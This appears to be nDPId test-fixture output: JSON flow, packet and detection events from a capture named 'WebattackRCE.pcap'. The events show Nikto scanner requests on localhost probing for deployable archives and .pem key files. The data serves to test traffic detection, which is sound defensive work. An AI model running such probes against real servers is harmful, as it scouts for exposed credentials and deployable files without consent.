+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_packet_id":1,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277029,"pkt":"AAAAAAAAAAAAAAAACABFAADAF9FAAEAGJGV\/AAABfwAAAcNWH5ByeS+n3HjH64AYAED+tAAAAQEICp1m\/E2dZvxNR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":231,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277029,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_packet_id":1,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277031,"pkt":"AAAAAAAAAAAAAAAACABFAADASFpAAEAG89t\/AAABfwAAAcNYH5CIKHAy4FE5l4AYAED+tAAAAQEICp1m\/E+dZvxPR0VUIC8xMjcwLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":232,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277031,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_packet_id":1,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277032,"pkt":"AAAAAAAAAAAAAAAACABFAAC9MI5AAEAGC6t\/AAABfwAAAcNaH5DGiQjnE8I6SoAYAED+sQAAAQEICp1m\/FCdZvxQR0VUIC8wLmVnZyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":233,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277032,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_packet_id":1,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277033,"pkt":"AAAAAAAAAAAAAAAACABFAAC9R6NAAEAG9JV\/AAABfwAAAcNcH5BSP3\/MbAOkN4AYAED+sQAAAQEICp1m\/FGdZvxRR0VUIC8wLmVnZyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":234,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277033,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 